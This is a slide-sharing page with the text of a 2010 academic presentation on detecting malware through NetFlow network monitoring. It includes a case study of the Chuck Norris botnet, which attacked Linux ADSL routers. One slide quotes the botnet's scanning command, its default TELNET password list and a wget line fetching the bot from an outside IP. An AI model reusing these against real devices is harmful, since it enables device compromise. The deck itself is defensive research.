malware detection from the network perspective using
play

Malware Detection From The Network Perspective Using NetFlow Data - PowerPoint PPT Presentation

Aug 13, 2022 •820 likes •1.19k views

Malware Detection From The Network Perspective Using NetFlow Data P. eleda, J. Vykopal, T. Plesnk, M. Truneka, V. Krmek {celeda|vykopal|plesnik|trunecka|vojtec}@ics.muni.cz 3rd NMRG Workshop on NetFlow/IPFIX Usage in Network

  1. Malware Detection From The Network Perspective Using NetFlow Data P. Čeleda, J. Vykopal, T. Plesník, M. Trunečka, V. Krmíček {celeda|vykopal|plesnik|trunecka|vojtec}@ics.muni.cz 3rd NMRG Workshop on NetFlow/IPFIX Usage in Network Management July 30, 2010, Maastricht, The Netherlands

  2. Part I Introduction P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 2 / 25

  3. Present Computer Security Present Essentials and Best Practices host-based: firewall, antivirus, automated patching, NAC 1 network-based: firewall, antispam filter, IDS 2 , UTM 3 Network Security Monitoring Necessary complement to host-based approach. NBA 4 is a key approach in large and high-speed networks. Traffic acquisition and storage is almost done, security analysis is a challenging task . 1 Network Access Control, 2 Intrusion Detection System 3 Unified Threat Management, 4 Network Behavior Analysis P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 3 / 25

  4. NetFlow Applications in Time Originally Accounting P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 4 / 25

  5. NetFlow Applications in Time Then Originally Incident handling Accounting Network forensics P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 4 / 25

  6. NetFlow Applications in Time Then Originally Now Incident handling Intrusion detection Accounting Network forensics P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 4 / 25

  7. Masaryk University, Brno, Czech Republic 9 faculties: 200 departments and institutes 48 000 students and employees 15 000 networked hosts 2x 10 gigabit uplinks to CESNET Number of Flows in MU Network (5-minute Window) Interval Flows Packets Bytes 1500000 Second 5 k 150 k 132 M Minute 300 k 9 M 8 G Hour 15 M 522 M 448 G 1000000 Day 285 M 9.4 G 8 T Week 1.6 G 57 G 50 T 500000 Average traffic volume at the edge links in peak hours. 0 Mon Tue Wed Thu Fri Sat Sun P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 5 / 25

  8. NetFlow Monitoring at Masaryk University FlowMon probe FlowMon probe FlowMon probe NetFlow data generation P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 6 / 25

  9. NetFlow Monitoring at Masaryk University FlowMon probe NetFlow v5/v9 FlowMon probe NetFlow collector FlowMon probe NetFlow data NetFlow data generation collection P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 6 / 25

  10. NetFlow Monitoring at Masaryk University FlowMon SPAM probe detection NetFlow worm/virus v5/v9 detection FlowMon probe NetFlow intrusion collector detection FlowMon probe NetFlow data NetFlow data NetFlow data generation collection analyses P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 6 / 25

  11. NetFlow Monitoring at Masaryk University http WWW FlowMon SPAM probe detection NetFlow worm/virus v5/v9 mail detection FlowMon mailbox probe NetFlow intrusion collector syslog detection FlowMon syslog probe server NetFlow data NetFlow data NetFlow data incident generation collection analyses reporting P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 6 / 25

  12. Part II Malware Detection P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 7 / 25

  13. Malware Threats Malware "software designed to infiltrate a computer system without the owner’s informed consent " 5 computer viruses, worms, trojan horses, spyware, dishonest adware, crimeware, rootkits, ... Malware Threats infected ("zombie") computers used for criminal activities privacy data stealing, (D)DoS attacks, sending spam, hosting contraband, phising/pharming victims are end users , servers and the network infrastructure too 5 Wikipedia P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 8 / 25

  14. Malware Detection Approaches Host-Based Approach AVS, anti-spyware and anti-malware detection tools based on pattern matching and heuristics only local information from the computer zero day attacks and morphing code often undetected Network-Based Approach overview of the whole network behavior high-level information about the state of the network use of NBA methods for malware detection P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 9 / 25

  15. Network Behavior Analysis (NBA) NBA Principles identifies malware from network traffic statistics watch what’s happening inside the network single purpose detection patterns ( scanning, botnets, ... ) complex models of the network behavior statistical modeling , PCA 6 NBA Advantages good for spotting new malware and zero day exploits suitable for high-speed networks should be used as an enhancement to the protection provided by the standard tools ( firewall, IDS, AVS, ... ) 6 Principal Component Analysis P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 10 / 25

  16. NBA Example - MINDS Method Features: Flow counts from/to important IP/port combinations. Malware identification: Comparison with windowed average of past values. P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 11 / 25

  17. Part III Chuck Norris Botnet in Nutshell P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 12 / 25

  18. Chuck Norris Botnet Linux malware – IRC bots with central C&C servers. Attacks poorly-configured Linux MIPSEL devices. Vulnerable devices – ADSL modems and routers . Uses TELNET brute force attack as infection vector. Users are not aware about the malicious activities. Missing anti-malware solution to detect it. Discovered at Masaryk University on 2 December 2009. The malware got the Chuck Norris moniker from a comment in its source code [R]anger Killato : in nome di Chuck Norris ! P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 13 / 25

  19. Botnet Lifecycle Scanning for vulnerable devices in predefined networks IP prefixes of ADSL networks of worldwide operators network scanning – # pnscan -n30 88.102.106.0/24 23 Infection of a vulnerable device TELNET dictionary attack – 15 default passwords admin, password, root, 1234, dreambox, blank password IRC bot initialization IRC bot download and execution on infected device wget http://87.98.163.86/pwn/syslgd;. . . Botnet C&C operations further bots spreading and C&C commands execution DNS spoofing and denial-of-service attacks P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 14 / 25

  20. Botnet Attacks DoS and DDoS Attacks TCP ACK flood TCP SYN flood UDP flood P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 15 / 25

  21. Botnet Attacks DoS and DDoS Attacks TCP ACK flood TCP SYN flood UDP flood DNS Spoofing Attack Web page redirect: www.facebook.com www.google.com Malicious code execution. P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 15 / 25

  22. Botnet Attacks DoS and DDoS Attacks botnet C&C Center OpenDNS.com TCP ACK flood TCP SYN flood UDP flood DNS Spoofing Attack Web page redirect: www.facebook.com www.facebook.com www.google.com Malicious code execution. P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 15 / 25

  23. Botnet Attacks DoS and DDoS Attacks botnet C&C Center OpenDNS.com TCP ACK flood TCP SYN flood UDP flood DNS Spoofing Attack Web page redirect: www.facebook.com www.facebook.com www.google.com Malicious code execution. P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 15 / 25

  24. Botnet Attacks DoS and DDoS Attacks botnet C&C Center OpenDNS.com www.linux.org TCP ACK flood TCP SYN flood UDP flood DNS Spoofing Attack Web page redirect: www.facebook.com www.linux.org www.facebook.com www.google.com Malicious code execution. P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 15 / 25

  25. Botnet Size and Evaluation Size estimation based on NetFlow Most Infected ISPs data from Masaryk University. Telefonica del Peru Global Village Telecom (Brazil) Turk Telecom 33000 unique attackers (infected Pakistan Telecommunication Company China Unicom Hebei Province Network devices) from 10/2009 – 02/2010 . 500000 2500 Telnet Scans Against Masaryk University Network Unique attackers targeting the MU network Telnet Scans Against Masaryk University Network Month Min Max Avr Mdn 400000 2000 October 0 854 502 621 November 41 628 241 136 December 69 1321 366 325 Unique Attackers January 9 1467 312 137 300000 1500 February 180 2004 670 560 Total 0 2004 414 354 200000 1000 Botnet stopped activity 100000 500 on 23 February 2010 . 0 0 Oct 1 Nov 1 Dec 1 Jan 1 Feb 1 Mar 1 Apr 1 P. Čeleda et al. Malware Detection From The Network Perspective Using NetFlow Data 16 / 25

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Outline Intrusion detection systems Malware and the network CSci 5271 Announcements

Outline Intrusion detection systems Malware and the network CSci 5271 Announcements

Outline Intrusion detection systems Malware and the network CSci 5271 Announcements intermission Introduction to Computer Security Middlebox, malware, anonymity combined slides Denial of service and the network Anonymous communications

253 views • 11 slides
Outline Intrusion detection systems CSci 5271 Malware and the network Introduction to Computer

Outline Intrusion detection systems CSci 5271 Malware and the network Introduction to Computer

Outline Intrusion detection systems CSci 5271 Malware and the network Introduction to Computer Security Announcements intermission Day 22: Malware and Denial of Service Stephen McCamant Denial of service and the network University of

684 views • 10 slides
A CUCKOOS EGG IN THE MALWARE NEST ON-THE-FLY SIGNATURE-LESS MALWARE ANALYSIS, DETECTION AND

A CUCKOOS EGG IN THE MALWARE NEST ON-THE-FLY SIGNATURE-LESS MALWARE ANALYSIS, DETECTION AND

A CUCKOOS EGG IN THE MALWARE NEST ON-THE-FLY SIGNATURE-LESS MALWARE ANALYSIS, DETECTION AND CONTAINMENT FOR LARGE NETWORKS CHRISTIAAN SCHADE TWENTE SECURITY LAB UNIVERSITY OF TWENTE THE NETHERLANDS MALWARE WARS In the last

313 views • 14 slides
On Static Malware Detection Tayssir Touili LIPN, CNRS & Univ. Paris 13 Motivation: Malware

On Static Malware Detection Tayssir Touili LIPN, CNRS & Univ. Paris 13 Motivation: Malware

On Static Malware Detection Tayssir Touili LIPN, CNRS & Univ. Paris 13 Motivation: Malware Detection The number of new malware exceeds 75 million by the end of 2011, and is still increasing. The number of malware that produced

1.34k views • 91 slides
MALWARE DETECTION BY EATING A WHOLE EXE Presented by: Edward Raff Jared Sylvester Robert

MALWARE DETECTION BY EATING A WHOLE EXE Presented by: Edward Raff Jared Sylvester Robert

MALWARE DETECTION BY EATING A WHOLE EXE Presented by: Edward Raff Jared Sylvester Robert Brandon 1 November 2017 2 Malware Detection? Dont AVs do that? Single incidents of malware are now causing millions in damages. Potential

347 views • 19 slides
D&D of malware with exotic C&C D&D = Description & Detection C&C = Command

D&D of malware with exotic C&C D&D = Description & Detection C&C = Command

D&D of malware with exotic C&C D&D = Description & Detection C&C = Command & Control Automotive Consumer Energy & Chemicals Paul Rascagneres - @r00tbsd Eric Leblond - @Regiteric D&D of malware with exotic C&C

781 views • 34 slides
Experiences of of La Landing Machine Le Learning onto Market-Scale Mobile Malware Detection

Experiences of of La Landing Machine Le Learning onto Market-Scale Mobile Malware Detection

Experiences of of La Landing Machine Le Learning onto Market-Scale Mobile Malware Detection Liangyi Gong, Zhenhua Li, Feng Qian, Zifan Zhang, Qi Alfred Chen, Zhiyun Qian, Hao Lin, Yunhao Liu Mobile Malware Detection Android App Markets

424 views • 29 slides
Efficient Malware Detection using Model-Checking Tayssir Touili LIPN, CNRS & Univ. Paris 13

Efficient Malware Detection using Model-Checking Tayssir Touili LIPN, CNRS & Univ. Paris 13

Efficient Malware Detection using Model-Checking Tayssir Touili LIPN, CNRS & Univ. Paris 13 Motivation: Malware Detection The number of new malware exceeds 75 million by the end of 2011, and is still increasing. The number of

1.04k views • 52 slides
Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis Paul Royal

Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis Paul Royal

Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis Paul Royal paul@gtisc.gatech.edu Agenda Modern Malware Obfuscations, Server-side Polymorphism, Collection Volume Malware Analysis Detection

504 views • 27 slides
Analyzing Malware Detection Effectiveness with Multiple Anti- Malware Programs Jose A. Morales

Analyzing Malware Detection Effectiveness with Multiple Anti- Malware Programs Jose A. Morales

Analyzing Malware Detection Effectiveness with Multiple Anti- Malware Programs Jose A. Morales Shouhuai Xu Ravi Sandhu SEI @ CMU CS @ UTSA ICS @ UTSA Roadmap Motivation Experimental Methodology Experimental Results Summary

560 views • 16 slides
Outline Malware and the network, contd Denial of service and the network CSci 5271

Outline Malware and the network, contd Denial of service and the network CSci 5271

Outline Malware and the network, contd Denial of service and the network CSci 5271 Introduction to Computer Security Announcements intermission Malware and anonymity combined lecture Anonymous communications techniques Stephen McCamant

665 views • 10 slides
How does Malware Use RDTSC? A Study on Operations Executed by Malware with CPU Cycle Measurement

How does Malware Use RDTSC? A Study on Operations Executed by Malware with CPU Cycle Measurement

How does Malware Use RDTSC? A Study on Operations Executed by Malware with CPU Cycle Measurement Yoshihiro Oyama University of Tsukuba 1 Background Many malware programs execute operations for analysis evasion Detection of

346 views • 31 slides
Behavioral Detection and Containment of Proximity Malware in Delay Tolerant Networks Wei Peng,

Behavioral Detection and Containment of Proximity Malware in Delay Tolerant Networks Wei Peng,

Behavioral Detection and Containment of Proximity Malware in Delay Tolerant Networks Wei Peng, Feng Li, Xukai Zou, and Jie Wu 1 / 47 Proximity malware Definition. Proximity malware is a malicious program which propagates

618 views • 47 slides
Apposcopy: Semantics- Based Detection of Android Malware through Static Analysis By Feng et al

Apposcopy: Semantics- Based Detection of Android Malware through Static Analysis By Feng et al

Apposcopy: Semantics- Based Detection of Android Malware through Static Analysis By Feng et al [FSE 14] Presented by Maaz Ahmad The Malware Problem (Feb, 2015) Motive Security Labs estimates 16 million infected mobile devices. [1]

828 views • 30 slides
Netgator: Malware Detection Using Program Interactive Challenges Brian Schulte, Haris

Netgator: Malware Detection Using Program Interactive Challenges Brian Schulte, Haris

Netgator: Malware Detection Using Program Interactive Challenges Brian Schulte, Haris Andrianakis, Kun Sun, and Angelos Stavrou Intro Increase of stealthy malware in enterprises Obfuscation, polymorphic techniques Often uses

766 views • 25 slides
Dynamic profiles for malware communication Joao Marques, Mick Cox MSc System & Network

Dynamic profiles for malware communication Joao Marques, Mick Cox MSc System & Network

Dynamic profiles for malware communication Joao Marques, Mick Cox MSc System & Network Engineering University of Amsterdam Monday 6 February, 2017 Outline Introduction Part I - Intrusion Detection Part II: Botnets & Advanced

625 views • 40 slides
Defense against the Dark Arts Overview / Terminology 1 malware evil software display a

Defense against the Dark Arts Overview / Terminology 1 malware evil software display a

Defense against the Dark Arts Overview / Terminology 1 malware evil software display a funny message send passwords/credit card numbers to criminals take pictures to send to criminals delete data hold data hostage insert/replace ads

1.17k views • 63 slides
The Truth is Out There: Reflections on Search in Software Engineering Christopher L. Simons

The Truth is Out There: Reflections on Search in Software Engineering Christopher L. Simons

The Truth is Out There: Reflections on Search in Software Engineering Christopher L. Simons Department of Computer Science and Creative Technologies, University of the West of England, Bristol, BS16 1QY, United Kingdom Abstract In the popular

370 views • 15 slides
Outline Introduction Literature Review Variable Neighborhood Search Computational

Outline Introduction Literature Review Variable Neighborhood Search Computational

Variable Neighborhood Search for Flowshop Problem with Sequence Dependent Setup Times Gne Ylmaz , Ceyda Ouz Ko University, Istanbul, Turkey New Challenges in Scheduling Theory Aussois, France April 03, 2014 Outline Introduction

540 views • 22 slides
Evolutionary Computation for Feature Selection and Feature Construction Bing Xue School of

Evolutionary Computation for Feature Selection and Feature Construction Bing Xue School of

Evolutionary Computation for Feature Selection and Feature Construction Bing Xue School of Engineering and Computer Science Victoria University of Wellington Bing.Xue@ecs.vuw.ac.nz IEEE CIS Webinar Mon, Sep 25, 2017 2:00 PM - 3:00 PM NZDT

1.7k views • 67 slides
Do Not Track The Future of Web Privacy Nick Doty UC Berkeley, School of Information World Wide

Do Not Track The Future of Web Privacy Nick Doty UC Berkeley, School of Information World Wide

Do Not Track The Future of Web Privacy Nick Doty UC Berkeley, School of Information World Wide Web Consortium http://npdoty.name who I am "future of" a clarification not that Do Not Track is a solution to all Web privacy problems

560 views • 34 slides
Hands-On Ethical Hacking and Network Defense Second Edition - Chapter 3 Network and Computer

Hands-On Ethical Hacking and Network Defense Second Edition - Chapter 3 Network and Computer

Hands-On Ethical Hacking and Network Defense Second Edition - Chapter 3 Network and Computer Attacks Objectives After reading this chapter and completing the exercises , you will be able to: Describe the different types of malicious

84 views • 7 slides
Malicious Logic Trojan Horses Viruses Worms Fall 2010 CS 334: Computer Security Slide #1

Malicious Logic Trojan Horses Viruses Worms Fall 2010 CS 334: Computer Security Slide #1

Malicious Logic Trojan Horses Viruses Worms Fall 2010 CS 334: Computer Security Slide #1 Introduction Malicious Logic: a set of instructions that cause violation of security policy Idea taken from Troy: to breach an impenetrable

1.3k views • 109 slides
Botnets: The Web Killer Chris Lee Computer Network Security March 7th, 2008 Online Crime

Botnets: The Web Killer Chris Lee Computer Network Security March 7th, 2008 Online Crime

Botnets: The Web Killer Chris Lee Computer Network Security March 7th, 2008 Online Crime Motives Tactics Money Spam Thuggery DDoS Espionage Targeted attacks Money Proxies Phishing

295 views • 13 slides

More recommend